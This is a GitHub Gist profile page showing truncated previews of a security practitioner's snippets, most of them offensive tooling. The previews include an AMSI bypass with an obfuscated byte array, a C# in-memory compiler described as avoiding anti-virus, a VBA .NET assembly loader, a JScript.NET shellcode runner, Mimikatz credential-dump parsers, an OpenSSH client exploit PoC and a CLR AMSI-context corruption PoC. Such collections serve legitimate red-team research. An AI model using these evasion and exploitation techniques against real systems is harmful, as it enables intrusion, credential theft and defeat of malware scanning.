Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View Get-Ticker.ps1
# Converted from bash to Powershell reference:
function Get-Ticker([string]$CompanyName, [string]$Ticker) {
$Query = ""
if ($CompanyName) {
$Query = $CompanyName.Replace(' ', '+')
elseif ($Ticker) {
$Query = $Ticker.Replace(' ', '+')
davehardy20 / mscorlib_load_assembly.vba
Created Sep 30, 2019 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
View mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
davehardy20 /
Created Aug 17, 2019 — forked from jadonk/
Installing mjpg-streamer
davehardy20 / CompileInMemory.cs
Created Aug 13, 2019
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: However, this will still execute csc.exe and drop a dll to %temp%
View CompileInMemory.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
class Program
View amsi-bypass.ps1
$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,
View One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
davehardy20 / shellcode.js
Created Jul 27, 2017
Execute ShellCode Via Jscript.NET
View shellcode.js
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
davehardy20 /
Created Jan 18, 2019 — forked from mehaase/
SSHtranger Things Exploit POC
Title: SSHtranger Things
Author: Mark E. Haase <>
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
davehardy20 /
Created Jan 1, 2019
DigitalOcean Coupon Code $35 / $100 1 Year Free Trial - January 2019

alt text

Digital Ocean Promo Coupon Code $35 / $100 1 Year Free Trial

1) Get $35 / $25 / $20 / $10 free DigitalOcean Credit.

2) Get DigitalOcean 1 Year Free Trial.

3) Get $100 Credit For 60 Days. $100 Free Credits

davehardy20 / CorruptCLRGlobal.ps1
Created Dec 7, 2018 — forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
View CorruptCLRGlobal.ps1
function Subvert-CLRAntiMalware {
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
You can’t perform that action at this time.